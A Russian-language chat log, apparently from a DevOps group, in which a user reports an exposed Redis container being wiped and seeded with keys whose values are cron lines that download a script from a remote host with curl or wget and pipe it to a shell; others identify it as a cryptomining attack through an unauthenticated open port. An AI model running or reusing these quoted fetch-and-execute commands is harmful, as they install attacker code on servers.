Без вопросов, сам похоже ставил.
просто doc файл смутил.

Ребят, а никто не знает, что за ерунда: у меня на сервере запускается Redis через docker-compose, пробрасывается только порт. Через какое-то время база просто очищается, но появляются ключи верхнего уровня (писать в Редиску может только АПИ, но ключи верхнего уровня - нет) Back1, Back2, Back3 и Back4, у которых значения оч странные:
"\t\n*/20 * * * * curl -fsSL http://d.powerofwish.com/pm.sh | sh\n\t"
"\t\n*/30 * * * * wget http://d.powerofwish.com/pm.sh -O .p && bash .p\n\t"

Я уже думаю, что это хак какой-то... Ну совсем не здоровая тема

а редис наружу в инет открыт?
у нас была в конторе подобная фигня - через открытый наружу редис майнинг запустили

Да вроде нет... Интересно, конечно. Спасибо за инфу. Я гуглил, но этот урл встречается в связке Redis + Honeypot, что как бы намекает)

Ммм, рили открыт) Вот так безопасность 😄

вот-вот. Майнеры самоучки это

@danya Помнишь было дело?

А ты креды проставил?

Помню было дело

Но мы грамотно и героически все локализовали без потерь в кратчайшие сроки

угу, тебе огромный респект за бдительность )

Там не совсем я это делал. Полагаю, что нет, просто подняли контейнер, пробросили порт и забили. Благо, это не боевой сервак

Двойное) Подтвердили мои опасения

Вообще удивительно как такие люди работают

Впрочем, я скпетически отношусь ко всяким хитрым ограничениям прав в кубе и анальным пляскам с пермишенами

Так что чья бы корова

Но контур-то защищать надо обязательно

Всем привет Как стать хорошим DevSecOps  есть ресурсы? и сколько времени займет.  я сам гуглил просто интересно мнения реальных специалистов в этой области.  Спасибо всем